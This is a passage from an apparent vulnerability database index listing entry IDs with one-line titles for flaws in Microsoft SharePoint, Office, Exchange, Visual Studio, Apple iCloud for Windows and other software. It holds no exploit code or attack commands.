SharePoint Enterprise Server privilege escalation [153246] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153242] Microsoft Office up to 2019 Access Connectivity Engine memory corruption [153238] Microsoft SharePoint Enterprise Server cross site scripting [153222] Microsoft SharePoint Enterprise Server cross site scripting [153221] Microsoft SharePoint Enterprise Server cross site scripting [153220] Microsoft SharePoint Enterprise Server cross site scripting [153219] Microsoft SharePoint Enterprise Server cross site scripting [153218] Microsoft SharePoint Enterprise Server cross site scripting [153217] Microsoft SharePoint Enterprise Server cross site scripting [153216] Microsoft SharePoint Enterprise Server Source Markup privilege escalation [153211] Microsoft Office/Excel/Office 365 memory corruption [153210] Microsoft Visual Studio up to 2019 Version 16.5 Extension Installer Service privilege escalation [153209] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.4/2019 16.5 Updater Service privilege escalation [153194] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [153192] Microsoft SharePoint Enterprise Server/SharePoint Server Application Package privilege escalation [153186] Microsoft SharePoint Enterprise Server/SharePoint Server cross site scripting [153179] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153178] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153177] Microsoft SharePoint Enterprise Server Application Package privilege escalation [152629] Apple iCloud up to 7.17 on Windows WebKit Page Loading Incorrect Control Flow [152628] Apple iCloud up to 7.17 on Windows WebKit cross site scripting [152627] Apple iCloud up to 7.17 on Windows WebKit denial of service [152626] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152625] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152624] Apple iCloud up to 7.17 on Windows WebKit race condition [152623] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152622] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152621] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152620] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152619] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152618] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152617] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152616] Apple iCloud up to 10.9.2 on Windows WebKit Page Loading Incorrect Control Flow [152615] Apple iCloud up to 10.9.2 on Windows WebKit cross site scripting [152614] Apple iCloud up to 10.9.2 on Windows WebKit denial of service [152613] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152612] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152611] Apple iCloud up to 10.9.2 on Windows WebKit race condition [152610] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152609] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152608] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152607] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152606] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152605] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152604] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152283] Serendipity up to 2.3.3 on Windows privilege escalation [151931] signotec signoPAD-API-Web up to 3.1.0 on Windows WebSocket privilege escalation [151173] Microsoft Exchange Server 2016 CU14/2016 CU15/2019 CU3/2019 CU4 cross site scripting [151168] Microsoft SharePoint Enterprise Server cross site scripting [151167] Microsoft SharePoint Enterprise Server cross site scripting [151166] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [151165] Microsoft SharePoint Enterprise Server cross site scripting [151162] Microsoft Visual Studio up to 2017 Version 15.9/2019 version 16.4 weak encryption [151130] Microsoft Azure DevOps Server 2019 Update 1.1 Pipeline Job Token privilege escalation [151117] Microsoft Business Productivity Servers cross site scripting [151114] Microsoft Visual Studio up to 2019 Version 16.4 Extension Installer Service privilege escalation [151093] Microsoft Azure DevOps Server/Team Foundation Server Pipeline Job Token privilege escalation [151092] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [151090] Microsoft IIS privilege escalation [151089] Microsoft Office 365 ProPlus/2019 for Mac Word memory corruption [151088] Microsoft Office 2016 for Mac/2019/Online Server Word memory corruption [151087] Microsoft Office 365 ProPlus/2016 for Mac Word memory corruption [151086] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 Word memory corruption [150860] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150859] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150766] Apple iCloud on Windows CoreCrypto denial of service [150765] Apple iCloud on Windows CoreCrypto denial of service [150715] PHP up to 7.3.14/7.4.2 on Windows PHAR File information disclosure [150694] Apple iCloud up to 10.9.1 on Windows WebKit Page Loading memory corruption [150692] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150691] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150690] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150689] Apple iCloud up to 10.9.1 on Windows WebKit Universal cross site scripting [150688] Apple iCloud up to 10.9.1 on Windows libxml2 privilege escalation [150687] Apple iCloud up to 10.9.1 on Windows ImageIO information disclosure [150614] Apple iCloud up to 7.16 on Windows WebKit Page Loading DOM-Based memory corruption [150613] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150612] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150611] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150610] Apple iCloud up to 7.16 on Windows WebKit Universal cross site scripting [150609] Apple iCloud up to 7.16 on Windows libxml2 privilege escalation [150608] Apple iCloud up to 7.16 on Windows ImageIO information disclosure [150052] IBM Cloud CLI up to 0.16.1 Windows Installer weak authentication [149969] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [149968] Microsoft Office up to 2019 Excel memory corruption [149918] Microsoft Office 365 ProPlus OLicenseHeartbeat privilege escalation [149917] Microsoft Office up to 2019 Security Feature privilege escalation [149916] Microsoft Office Online Server privilege escalation [149915] Microsoft SharePoint Enterprise Server 2013 P1/2016/2019 cross site scripting [149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation [149507] CPython up to 3.8.1 on Windows 7 Dependency Load api-ms-win-core-path-l1-1-0.dll privilege escalation [149361] Cisco Webex Teams Client on Windows denial of service [149313] Microsoft Outlook on Android Email privilege escalation [148624] Microsoft .NET Framework up to 4.8 privilege escalation [148623] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148622] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148619] Microsoft Office 365 ProPlus Excel memory corruption [148618] Microsoft Office up to 2019 for Mac memory corruption [148617] Microsoft Excel up to 2019 for Mac memory corruption [148616] Microsoft Excel up to 2019 for Mac memory corruption [148615] Microsoft Office Online Server privilege escalation [148306] cURL up to 7.67.x on Windows File privilege escalation [147595] PHP up to 7.3.12 on Windows Header mail memory corruption [147591] PHP up to 7.2.25/7.3.12 on Windows Filename link memory corruption [147443] Apple iCloud 7.13/10.6 on Windows memory corruption [147439] Apple iCloud 7.13/10.6 on Windows Text File information disclosure [147436] Apple iCloud 7.13/10.6 on Windows memory corruption [147434] Apple iCloud 7.13/10.6 on Windows memory corruption [147432] Apple iCloud 7.13/10.6 on Windows memory corruption [147430] Apple iCloud 7.13/10.6 on Windows State Management Universal cross site scripting [147427] Apple iCloud 7.13/10.6 on Windows memory corruption [147425] Apple iClouds 7.13/10.6 on Windows State Management Universal cross site scripting [147033] Microsoft Visual Studio Git privilege escalation [147032] Microsoft Visual Studio Git privilege escalation [147031] Microsoft Visual Studio Git privilege escalation [147030] Microsoft Visual Studio Git privilege escalation [147029] Microsoft Visual Studio Git privilege escalation [147028] Microsoft Visual Studio Git privilege escalation [146927] Microsoft Skype for Business Server 2019 CU2 privilege escalation [146922] Microsoft Authentication Library up to 0.3.1-Alpha on Android information disclosure [146920] Microsoft Visual Studio 2019 Redirect [146866] Microsoft Office up to 2019 Excel information disclosure [146865] Microsoft Office up to 2019 Access information disclosure [146864] Microsoft Office up to 2019 PowerPoint privilege escalation [146863] Microsoft Office up to 2019 Word privilege escalation [146861] Microsoft Office up to 2019 Access information disclosure [146860] Microsoft Power BI Report Server cross site scripting [146853] Lenovo Energy Management Driver up to 15.11 on Windows 10 privilege escalation [146803] Microsoft Visual Studio 2008 Express XML External Entity [146800] Microsoft Excel XML Import XML External Entity [146332] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [146331] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [145418] Microsoft Office 2016/2019 on Mac Excel privilege escalation [145401] Microsoft Office 365 ProPlus/2019 ClickToRun Security Feature privilege escalation [145400] Microsoft Office up to 2019 Excel memory corruption [145399] Microsoft Office Online Server privilege escalation [145398] Microsoft Office up to 2019 Excel information disclosure [145397] Microsoft Office Online Server privilege escalation [145396] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Upload privilege escalation [145395] Microsoft SharePoint Server 2019 Security Feature privilege escalation [145385] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.3 Archive privilege escalation [145368] Microsoft Office up to 2019 information disclosure [145347] Microsoft Azure Stack User Portal weak authentication [145343] Microsoft Exchange Server 2013 CU23/2016 CU13/2016 CU14/2019 CU2/2019 CU3 Metadata privilege escalation [144649] Apple iCloud up to 10.7 on Windows WebKit Process Model memory corruption [144648] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144647] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144646] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144645] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144644] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144643] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144642] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144641] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144640] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144639] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144638] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144637] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144636] Apple iCloud up to 10.7 on Windows WebKit Universal cross site scripting [144635] Apple iCloud up to 10.7 on Windows libxslt memory corruption [144633] Apple iCloud up to 7.14 on Windows WebKit Process Model memory corruption [144632] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144631] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144630] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144629] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144628] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144627] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144626] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144625] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144624] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144412] PostgreSQL up to 9.4.23/9.5.18/9.6.14/10.9/11.4 on Windows Installer privilege escalation [143123] Microsoft SQL Server Management Studio 18.3.1 Permission privilege escalation [143095] Microsoft Excel up to 2019 for Mac memory corruption [143094] Microsoft SharePoint Foundation Impersonation privilege escalation [143093] Microsoft cross site scripting [143092] Microsoft cross site scripting [143091] Microsoft Excel up to 2019 for Mac memory corruption [143078] Microsoft SQL Server Management Studio 18.3/18.3.1 Permission privilege escalation [143074] Microsoft cross site scripting [143070] Microsoft Azure App Service Sandbox memory corruption [141639] Microsoft SharePoint Foundation 2013 SP1 cross site request forgery [141638] Microsoft Team Foundation Server/Azure DevOps Server cross site scripting [141633] Microsoft Excel up to 2019 memory corruption [141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation [141612] Microsoft Yammer on Android Security Feature Policy privilege escalation [141611] Microsoft Office up to 2019 Security Feature privilege escalation [141610] Microsoft Excel up to 2019 information disclosure [141609] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [141608] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site request forgery [141607] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [141589] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 memory corruption [141583] Microsoft Lync Server 2013 Conference information disclosure [141582] Microsoft .NET Framework up to 4.8 Common Language Runtime privilege escalation [141576] Microsoft Team Foundation Server/Azure DevOps Server privilege escalation [141566] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 API privilege escalation [141565] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 API privilege escalation [141564] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 Markup privilege escalation [141382] LibreOffice up to 6.2.6/6.3.2 on Windows LibreLogo privilege escalation [141274] Cisco Webex Teams Client on Windows privilege escalation [141188] MongoDB up to 3.4.21/3.6.13/4.0.10 on Windows OpenSSL privilege escalation [140144] Tenable Nessus up to 8.5.2 on Windows privilege escalation [140066] Microsoft NuGet/ADAL.NET Azure Active Directory privilege escalation [139961] Microsoft Outlook on iOS Email privilege escalation [139957] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [139956] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Session Object information disclosure [139929] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [139904] Microsoft Word 365 ProPlus/2016/2019 memory corruption [139903] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 privilege escalation [139902] Microsoft Word up to 2019 memory corruption [139901] Microsoft Outlook up to 2019 memory corruption [139877] Microsoft Outlook up to 2019 memory corruption [139664] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139663] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139662] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139661] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139660] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139659] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139587] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [139586] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [138937] Microsoft Outlook on Android Message Parser privilege escalation [138718] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138717] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138716] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138715] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138714] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138713] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138712] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138711] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138710] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138709] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138708] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138707] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138706] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138705] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138704] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138703] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138702] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138701] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138700] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138699] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138698] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138697] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal information disclosure [138696] Apple iCloud up to 7.12/10.5 on Windows libxslt privilege escalation [137589] Microsoft Exchange Server 2013 CU23/2016 CU12/2016 CU13/2019 CU1/2019 CU2 cross site scripting [137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation [137587] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [137572] Microsoft Excel 365 ProPlus/2019 information disclosure [137571] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137570] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137569] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 JavaScript privilege escalation [137551] Microsoft Exchange Server Display Name Invisible information disclosure [137550] Microsoft .NET Framework up to 4.8 Common Object Runtime Library Data Processing Error [137548] Microsoft Visual Studio XML Data information disclosure [137547] Microsoft Visual Studio File Permission privilege escalation [137546] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [137542] Microsoft SQL Server 2014 SP2/2016 SP1/2017 privilege escalation [137536] Microsoft Azure Automation privilege escalation [137526] Microsoft Azure DevOps Server/Team Foundation Server File privilege escalation [137522] Microsoft .NET Framework up to 4.8 WCF/WIF SAML Token Impersonation weak authentication [137521] Microsoft .NET Framework up to 4.8 Source Markup privilege escalation [136414] Microsoft Azure DevOps Server 2019 cross site request forgery [136333] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136332] Microsoft Office 365 ProPlus/2016/2019 Word memory corruption [136331] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [136330] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136329] Microsoft SharePoint Server 2016/2019 cross site scripting [136328] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136327] Microsoft Lync Server 2010/2013 privilege escalation [136294] Microsoft IIS Request Filter Data Processing Error [135806] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135805] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135804] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135803] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135802] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135801] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135800] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135799] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135798] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135797] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135796] Apple iCloud up to 7.11 on Windows WebKit privilege escalation [135795] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135794] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135793] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135792] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135791] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135790] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135789] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135788] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135787] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135786] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135785] Apple iCloud up to 7.11 on Windows SQLite memory corruption [135784] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135783] Apple iCloud up to 7.11 on Windows SQLite sql injection [135782] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135307] Citrix Workspace App on Windows Access Control privilege escalation [134754] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [134753] Microsoft Dynamics 365/Dynamics CRM Attachment 7PK Security Features [134752] Microsoft Azure Active Directory Connect 1.3.20.0 PowerShell privilege escalation [134749] Microsoft .NET Framework/.NET Core Data Processing Error [134748] Microsoft .NET Framework/.NET Core Data Processing Error [134747] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134745] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [134743] Microsoft SharePoint Server 2013 SP1/2016 privilege escalation [134742] Microsoft SharePoint Enterprise Server 2016/2019 privilege escalation [134741] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [134740] Microsoft SharePoint Enterprise Server 2013 SP1/2016 7PK Security Features [134739] Microsoft SharePoint Foundation 2010 SP2/2013 SP2 privilege escalation [134738] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134737] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134736] Microsoft Office 2010 SP2 Access Connectivity Engine Data Processing Error [134735] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134734] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134730] Microsoft Skype 8.35 on Android Bluetooth Listening information disclosure [134708] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134707] Microsoft .NET Framework up to 4.8 memory corruption [134705] Microsoft .NET Framework/.NET Core Regex privilege escalation [134704] Microsoft SQL Server 2017 Analysis Services information disclosure [134697] Microsoft Office/Word 365 ProPlus/2016/2019 memory corruption [134672] Facebook WhatsApp Messenger on Android/iOS/Windows Phone/Tizen VoIP Stack memory corruption [134594] Google Go up to 1.12.5 on Windows Process privilege escalation [133645] Oracle Java SE 8u202 Windows DLL privilege escalation [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE privilege escalation [133235] Microsoft Azure DevOps Server 2019 privilege escalation [133232] Microsoft Azure DevOps Server 2019 cross site scripting [133231] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133230] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133229] Microsoft Azure DevOps Server 2019 privilege escalation [133228] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133227] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133226] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation [133223] Microsoft Azure DevOps Server 2019 Content Security Policy privilege escalation [133206] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [133205] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [133204] Microsoft Office/Excel up to 2019 memory corruption [133203] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133202] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133201] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133200] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133199] Microsoft Office 2010 SP2 Access Connectivity Engine privilege escalation [133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error [133184] Microsoft Office 365 ProPlus/2016 for Mac/2019 Graphics Component memory corruption [133181] Microsoft Office/Excel/PowerPoint up to 2019 URL Data Processing Error [133142] Microsoft Azure Linux Guest Agent Swap File information disclosure [132958] Apple iCloud up to 7.6 on Windows memory corruption [132948] Apple iCloud up to 7.6 on Windows denial of service [132943] Apple iCloud up to 7.6 on Windows memory corruption [132939] Apple iCloud up to 7.6 on Windows memory corruption [132934] Apple iCloud up to 7.6 on Windows memory corruption [132928] Apple iCloud up to 7.6 on Windows memory corruption [132923] Apple iCloud up to 7.6 on Windows URL cross site scripting [132902] Apple iCloud up to 7.6 on Windows memory corruption [132898] Apple iCloud up to 7.6 on Windows memory corruption [132892] Apple iCloud up to 7.6 on Windows IFRAME 7PK Security Features [132888] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132884] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132880] Apple iCloud up to 7.6 on Windows State Management memory corruption [132876] Apple iCloud up to 7.6 on Windows memory corruption [132872] Apple iCloud up to 7.6 on Windows memory corruption [132866] Apple iCloud up to 7.6 on Windows memory corruption [132862] Apple iCloud up to 7.6 on Windows information disclosure [132858] Apple iCloud up to 7.6 on Windows URL cross site scripting [132853] Apple iCloud up to 7.6 on Windows memory corruption [132847] Apple iCloud up to 7.6 on Windows memory corruption [132842] Apple iCloud up to 7.6 on Windows memory corruption [132838] Apple iCloud up to 7.6 on Windows memory corruption [132833] Apple iCloud up to 7.3 on Windows memory corruption [132416] Apple iCloud up to 7.10 on Windows WebKit Universal cross site scripting [132415] Apple iCloud up to 7.10 on Windows WebKit Memory privilege escalation [132414] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132413] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132412] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132411] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132410] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132409] Apple iCloud up to 7.10 on Windows WebKit information disclosure [132408] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132407] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132406] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132405] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132404] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132403] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132402] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132401] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132400] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132398] Apple iCloud up to 7.10 on Windows CoreCrypto memory corruption [131687] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 3.2/2018 Updated 1.2 cross site scripting [131684] Microsoft Visual Studio 2017 Version 15.9 C++ Redistributable Installer privilege escalation [131682] Microsoft Lync Server/Skype for Business privilege escalation [131675] Microsoft SharePoint 2013 SP1/2016 cross site scripting [131662] Microsoft Visual Studio on Mac Package Manager privilege escalation [131656] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [131529] Google Go up to 1.12 on Windows DLL Loader LoadLibrary privilege escalation [131334] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131333] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131332] Microsoft Java SDK for Azure IoT Log information disclosure [131331] Microsoft Java SDK for Azure IoT Key Generation weak encryption [131330] Microsoft Exchange Server 2010 SP3 UR26/2013 CU22/2016 CU12/2019 CU1 privilege escalation [131329] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [130951] FeiFeiCms 4.0.181010 on Windows index.php directory traversal [130832] Microsoft 2013 SP1 privilege escalation [130829] Microsoft Visual Studio Code privilege escalation [130828] Microsoft Exchange Server 2010 SP3/2013 CU22/2016 CU12/2019 CU1 EWS privilege escalation [130826] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [130825] Microsoft Office up to 2019 Connectivity Engine memory corruption [130824] Microsoft Office up to 2019 Connectivity Engine memory corruption [130823] Microsoft Office up to 2019 Connectivity Engine memory corruption [130822] Microsoft Office up to 2019 Connectivity Engine memory corruption [130821] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [130815] Microsoft .NET Framework up to 4.7.2 URL privilege escalation [130795] Microsoft .NET Framework up to 4.7.2 Source Markup memory corruption [130785] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Security Feature Phishing 7PK Security Features [130777] Microsoft SharePoint Server Application Package privilege escalation [130351] idreamsoft iCMS 7.0.13 on Windows editor.admincp.php directory traversal [130220] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130219] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130218] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130217] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130216] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130097] Apple iCloud up to 7.9 on Windows WebKit Universal cross site scripting [130096] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130095] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130094] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130093] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130092] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130091] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130090] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130089] Apple iCloud up to 7.9 on Windows WebKit privilege escalation [130088] Apple iCloud up to 7.9 on Windows SQLite memory corruption [130087] Apple iCloud up to 7.9 on Windows SQLite sql injection [130086] Apple iCloud up to 7.9 on Windows SQLite memory corruption [129847] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 1.2/2018 Update 3.2 information disclosure [129846] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [129845] Microsoft Skype for Business 2015 CU 8 privilege escalation [129835] GE Voluson S8 Windows Operating System Patches privilege escalation [129133] Apple iCloud up to 7.3 on Windows privilege escalation [129128] Apple iCloud up to 7.3 on Windows Reachable Assertion [129119] Apple iCloud up to 7.3 on Windows privilege escalation [129114] Apple iCloud up to 7.3 on Windows privilege escalation [129109] Apple iCloud up to 7.3 on Windows privilege escalation [129104] Apple iCloud up to 7.4 on Windows information disclosure [129048] Apple iCloud up to 7.2 on Windows memory corruption [128765] Microsoft Visual Studio 2017 Version 15.9 C++ Construct memory corruption [128764] Microsoft Exchange Server 2010 SP3/2013 CU21/2016 CU10/2016 CU11/2019 PowerShell API information disclosure [128763] Microsoft Exchange Server 2016 CU10/2016 CU11/2019 memory corruption [128762] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 Word privilege escalation [128746] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [128745] Microsoft Office up to 2019 Word Macro information disclosure [128744] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128743] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [128741] Microsoft SharePoint Enterprise Server 2016 cross site scripting [128740] Microsoft 